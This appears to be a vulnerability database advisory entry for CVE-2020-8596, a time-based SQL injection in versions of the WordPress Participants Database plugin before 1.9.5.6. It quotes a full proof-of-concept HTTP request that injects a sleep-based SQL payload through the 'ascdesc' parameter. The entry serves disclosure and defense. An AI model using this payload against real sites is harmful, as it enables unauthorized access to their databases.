Lucene search
WpvulndbWPEX-ID:CA4F3058-44BC-4AB8-9FBD-96D8BE6BE4FFHistoryFeb 10, 2020 - 12:00 a.m.
Participants Database < 1.9.5.6 - Authenticated Time Based SQL Injection
2020-02-1000:00:00
wpvulndb
24
EPSS
0.001
Percentile
47.2%
Authenticated time-based SQL injection via the ascdesc, list_filter_count, and sortBy parameters.
Form the original advisory (see references):
POST /wp-admin/admin.php?page=participants-database HTTP/1.1
Host: *redacted....cause*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: /wp-admin/admin.php?page=participants-database
Content-Type: application/x-www-form-urlencoded
Content-Length: 169
Connection: close
Cookie: *cookies were here*
Upgrade-Insecure-Requests: 1
action=admin_list_filter&search_field%5B0%5D=&operator%5B0%5D=LIKE&value%5B0%5D=&logic%5B0%5D=AND&list_filter_count=1&sortBy=date_updated&ascdesc=desc%2c(select*from(select(sleep(20)))a)&submit-button=SortReferences
Related
cve
cve
CVE-2020-8596
2020-02-11 12:15:21
wpvulndb
wpvulndb
Participants Database < 1.9.5.6 - Authenticated Time Based SQL Injection
2020-02-10 00:00:00
nvd
nvd
CVE-2020-8596
2020-02-11 12:15:21
patchstack
patchstack
cvelist
cvelist
CVE-2020-8596
2020-02-10 21:37:28
prion
prion
Sql injection
2020-02-11 12:15:00